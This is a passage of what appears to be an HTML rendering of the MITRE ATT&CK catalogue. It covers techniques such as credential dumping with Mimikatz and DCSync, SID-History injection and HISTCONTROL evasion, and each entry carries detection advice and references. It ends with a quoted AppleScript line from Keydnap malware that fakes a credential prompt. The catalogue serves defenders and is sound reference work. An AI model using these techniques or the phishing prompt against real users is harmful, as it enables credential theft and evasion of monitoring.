<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1010">https://attack.mitre.org/wiki/Technique/T1010</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multi_hop_proxy_t1188"><a class="anchor" href="#_multi_hop_proxy_t1188"></a><a class="link" href="#_multi_hop_proxy_t1188">Multi-hop Proxy - T1188</a></h3>
<div class="paragraph">
<p>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.</p>
</div>
<div class="paragraph">
<p>Detection: When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as ) or known adversary infrastructure that uses this technique.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Netflow/Enclave netflow</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 887. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1188">https://attack.mitre.org/wiki/Technique/T1188</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hypervisor_t1062"><a class="anchor" href="#_hypervisor_t1062"></a><a class="link" href="#_hypervisor_t1062">Hypervisor - T1062</a></h3>
<div class="paragraph">
<p>A type-1 hypervisor is a software layer that sits between the guest operating systems and system&#8217;s hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</p>
</div>
<div class="paragraph">
<p>Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 888. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1062">https://attack.mitre.org/wiki/Technique/T1062</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Hypervisor">https://en.wikipedia.org/wiki/Hypervisor</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://en.wikipedia.org/wiki/Xen">http://en.wikipedia.org/wiki/Xen</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&amp;rep=rep1&amp;type=pdf">http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&amp;rep=rep1&amp;type=pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html">http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_credential_dumping_t1003"><a class="anchor" href="#_credential_dumping_t1003"></a><a class="link" href="#_credential_dumping_t1003">Credential Dumping - T1003</a></h3>
<div class="paragraph">
<p>Credential dumping is the process of obtaining account login and password information from the operating system and software. Credentials can be used to perform Lateral Movement and access restricted information.</p>
</div>
<div class="paragraph">
<p>Tools may dump credentials in many different ways: extracting credential hashes for offline cracking, extracting plaintext passwords, and extracting Kerberos tickets, among others. Examples of credential dumpers include pwdump7, Windows Credential Editor, Mimikatz, and gsecdump. These tools are in use by both professional security testers and adversaries.</p>
</div>
<div class="paragraph">
<p>Plaintext passwords can be obtained using tools such as Mimikatz to extract passwords stored by the Local Security Authority (LSA). If smart cards are used to authenticate to a domain using a personal identification number (PIN), then that PIN is also cached as a result and may be dumped. (Citation: Github Mimikatz Module sekurlsa)</p>
</div>
<div class="paragraph">
<p>DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller&#8217;s application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account&#8217;s password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)</p>
</div>
<div class="paragraph">
<p>Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.</p>
</div>
<div class="paragraph">
<p>NTLM hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.</p>
</div>
<div class="paragraph">
<p>On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit&#8217;s Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</p>
</div>
<div class="paragraph">
<p>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 889. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1003">https://attack.mitre.org/wiki/Technique/T1003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a><sub>-sekurlsa[<a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a></sub>-sekurlsa]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=1729">https://adsecurity.org/?p=1729</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/">http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a><sub>-lsadump[<a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a></sub>-lsadump]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/cc228086.aspx">https://msdn.microsoft.com/library/cc228086.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/dd207691.aspx">https://msdn.microsoft.com/library/dd207691.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://wiki.samba.org/index.php/DRSUAPI">https://wiki.samba.org/index.php/DRSUAPI</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.winehq.org/WineAPI/samlib.html">https://source.winehq.org/WineAPI/samlib.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM">https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/cc237008.aspx">https://msdn.microsoft.com/library/cc237008.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/cc245496.aspx">https://msdn.microsoft.com/library/cc245496.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_deobfuscate_decode_files_or_information_t1140">Deobfuscate/Decode Files or Information - T1140</a></h3>
<div class="paragraph">
<p>Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting, PowerShell, or by using utilities present on the system.</p>
</div>
<div class="paragraph">
<p>One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)</p>
</div>
<div class="paragraph">
<p>Detection: Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as certutil.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Host intrusion prevention systems, Signature-based detection, Network intrusion detection system</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 890. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1140">https://attack.mitre.org/wiki/Technique/T1140</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/">https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_histcontrol_t1148"><a class="anchor" href="#_histcontrol_t1148"></a><a class="link" href="#_histcontrol_t1148">HISTCONTROL - T1148</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</p>
</div>
<div class="paragraph">
<p>Detection: Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Authentication logs, File monitoring, Environment variable</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Log analysis, Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 891. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1148">https://attack.mitre.org/wiki/Technique/T1148</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sid_history_injection_t1178"><a class="anchor" href="#_sid_history_injection_t1178"></a><a class="link" href="#_sid_history_injection_t1178">SID-History Injection - T1178</a></h3>
<div class="paragraph">
<p>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID)-History Attribute, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).</p>
</div>
<div class="paragraph">
<p>Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, Windows Admin Shares, or Windows Remote Management.</p>
</div>
<div class="paragraph">
<p>Detection: Examine data in users SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)</p>
</div>
<div class="paragraph">
<p>Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)</p>
</div>
<div class="paragraph">
<p>Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Authentication logs, Windows event logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 892. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1178">https://attack.mitre.org/wiki/Technique/T1178</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx">https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems">https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/ee617241.aspx">https://technet.microsoft.com/library/ee617241.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=1772">https://adsecurity.org/?p=1772</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/ms677982.aspx">https://msdn.microsoft.com/library/ms677982.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_web_service_t1102"><a class="anchor" href="#_web_service_t1102"></a><a class="link" href="#_web_service_t1102">Web Service - T1102</a></h3>
<div class="paragraph">
<p>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.</p>
</div>
<div class="paragraph">
<p>Popular websites and social media can act as a mechanism for command and control and give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.</p>
</div>
<div class="paragraph">
<p>Detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 893. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1102">https://attack.mitre.org/wiki/Technique/T1102</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_query_registry_t1012"><a class="anchor" href="#_query_registry_t1012"></a><a class="link" href="#_query_registry_t1012">Query Registry - T1012</a></h3>
<div class="paragraph">
<p>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.</p>
</div>
<div class="paragraph">
<p>The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Interaction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 894. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1012">https://attack.mitre.org/wiki/Technique/T1012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Windows%20Registry">https://en.wikipedia.org/wiki/Windows%20Registry</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_third_party_software_t1072"><a class="anchor" href="#_third_party_software_t1072"></a><a class="link" href="#_third_party_software_t1072">Third-party Software - T1072</a></h3>
<div class="paragraph">
<p>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.</p>
</div>
<div class="paragraph">
<p>Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</p>
</div>
<div class="paragraph">
<p>The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</p>
</div>
<div class="paragraph">
<p>Detection: Detection methods will vary depending on the type of third-party software or system and how it is typically used.</p>
</div>
<div class="paragraph">
<p>The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems.</p>
</div>
<div class="paragraph">
<p>Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious.</p>
</div>
<div class="paragraph">
<p>Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, File monitoring, Process monitoring, Process use of network, Third-party application logs, Windows Registry</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM, User</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 895. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1072">https://attack.mitre.org/wiki/Technique/T1072</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_file_copy_t1105"><a class="anchor" href="#_remote_file_copy_t1105"></a><a class="link" href="#_remote_file_copy_t1105">Remote File Copy - T1105</a></h3>
<div class="paragraph">
<p>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</p>
</div>
<div class="paragraph">
<p>Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.</p>
</div>
<div class="paragraph">
<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 896. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1105">https://attack.mitre.org/wiki/Technique/T1105</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_system_logical_offsets_t1006"><a class="anchor" href="#_file_system_logical_offsets_t1006"></a><a class="link" href="#_file_system_logical_offsets_t1006">File System Logical Offsets - T1006</a></h3>
<div class="paragraph">
<p>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)</p>
</div>
<div class="paragraph">
<p>Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through PowerShell, additional logging of PowerShell scripts is recommended.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: File monitoring, File system access controls</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 897. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1006">https://attack.mitre.org/wiki/Technique/T1006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin">http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_input_prompt_t1141"><a class="anchor" href="#_input_prompt_t1141"></a><a class="link" href="#_input_prompt_t1141">Input Prompt - T1141</a></h3>
<div class="paragraph">
<p>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:</p>
</div>
<div class="paragraph">
<p>&lt;code&gt;set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")&lt;/code&gt;
(Citation: OSX Keydnap malware)</p>
</div>
<div class="paragraph">
